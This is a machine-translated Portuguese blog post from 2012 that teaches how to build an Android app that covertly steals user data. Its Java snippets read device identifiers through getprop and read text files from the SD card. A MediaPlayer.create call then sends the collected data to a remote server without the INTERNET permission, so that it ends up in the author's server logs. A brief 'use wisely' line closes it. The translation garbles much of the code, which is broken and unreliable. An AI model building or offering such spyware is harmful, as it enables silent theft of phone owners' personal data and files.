http://skamason.com/7b9R

http://skamason.com/7b9R

sábado, 5 de maio de 2012

Como: Criar um aplicativo Android para roubar informações do usuário



Oi
Eu gostaria de compartilhar algumas coisas sobre o Android segurança, e vou tentar dar-lhe alguns exemplos, como na verdade você pode criar um aplicativo sem usar ou adicionar qualquer permissão incluindo android.permission.INTERNET, (normalmente é adicionado AndroidManifest.xml) , se você quiser que seu aplicativo para usar a conexão à Internet, com as funções abaixo, você será capaz de enviar dados para qualquer servidor sobre o http para o seu log apache no seu servidor, ou postar em suas páginas php. Primeiro vou mostrar-lhe que as informações estão disponíveis alguns que eu sei, talvez haja alguma informação mais desconhecido que está disponível. para ser enviar

1.List de detalhes sobre dispositivo do usuário, que podem ser tomadas, roubado e enviar para servidores remotos.
Normalmente, para obter algum usuário e telefone detalhada você precisa usar a permissão READ_PHONE_STATE mas se você utilizar a função abaixo
você realmente tem todas as informações sobre o usuário e telefone (número de telefone do usuário, ip, mac, país de telefone, empresa de telecomunicações, o endereço mac, ip, imei)

GetProp public void ()
{


try {
= String s "";


. Process p = Runtime.getRuntime () exec ("GetProp");
BufferedReader stdInput = new BufferedReader (new InputStreamReader (p.getInputStream ()));


while ((s = stdInput.readLine ()) = null)
{
Log.i ("Informações do Usuário:", "GetProp" + s);


}
}
catch (IOException e) {


}


}

2. Se você sabe como listar os aplicativos instalados, você pode usar o Gerenciador de Pacotes para Android e obter a lista de aplicativos instalados no telefone.

3.Você também pode escanear o sdcard e arquivos do celular e outros e verificar se há arquivos de texto.

Listando os arquivos disponíveis

públicas listfiles (void)
{


try {


File f = new File ("ls" + Environment.getExternalStorageDirectory ());
FileInputStream fileis = new FileInputStream (f);
Buf = new BufferedReader BufferedReader (new InputStreamReader (fileis));
Cordas ReadString = new String ();


while ((ReadString = buf.readLine ())! = null)
{
Log.i ("diretórios e arquivos:", ReadString);
}
}
catch (IOException e) {


}

leitura de um único arquivo no sdcard

3.a Leitura de um único arquivo

readsdcardfile public void ()
{


try {


File f = new File (Environment.getExternalStorageDirectory () + "filetoget.txt /");
FileInputStream fileIS = new FileInputStream (f);
Buf = new BufferedReader BufferedReader (new InputStreamReader (fileIS));
Cordas ReadString = new String ();


while ((ReadString = buf.readLine ())! = null)
{
Log.i ("file:", ReadString);
}
}
catch (IOException e) {


}




basicamente, você pode listar o primeiro por quaisquer arquivos de texto e, em seguida, ler todos os arquivos

E Finalmente, a parte mágica ok temos todas as informações, mas como é que vamos enviá-lo sem o conhecimento do usuário e colher alguns dados.

Este truque é muito simples de fazer, primeiro crie seus textos sobre as informações descritas acima que você deseja enviar que eu vou mostrar-lhe como enviá-los.
usando este código único de linha que você será capaz de se conectar a qualquer página http e enviar as suas cordas criadas anteriormente sobre telefone e detalhes do usuário ou arquivos de texto

MediaPlayer.create (isso,

Como é que isto irá enviar informações
Quando você chamar a função MediaPlayer.create estática, normalmente espera-se que você fornecer um link de vídeo de arquivo de áudio para streaming, bem, você não precisa, você pode simplesmente digitar qualquer url ainda vai conectar e mesmo que o link não está funcionando em do outro lado do servidor, você terá as informações que serão armazenadas em seus logs do servidor apache, porque você tem apenas solicitado um arquivo não existente no servidor com os detalhes do usuário e as outras coisas no url.

Você também pode criar uma página php e tentar postar seu material
php página de postagem, provavelmente deve funcionar como abaixo (eu testei este, mas supondo que ele só poderia trabalhar)

MediaPlayer.create (isso,

O truque principal deste tutorial é que sem o uso de qualquer permissão único em seu arquivo AndroidManifest.xml você será ainda capaz de enviar dados para qualquer servidor
usando apenas uma única linha de código que você acabou de pedir em seu site uma página não existente e que será registrado em seus serverlogs Apache ou se você tiver um arquivo de pós php você pode apenas imprimi-la em sua página ou armazenar em seu banco de dados.

MediaPlayer.create (este, Uri.parse ("http://www.kislaybhardwaj.com/mydetailstosendString));

Utilize este sabiamente e para fins de treinamento e apenas tomá-lo como um exemplo de como realmente android segurança é vulnerável.

Nenhum comentário:

Postar um comentário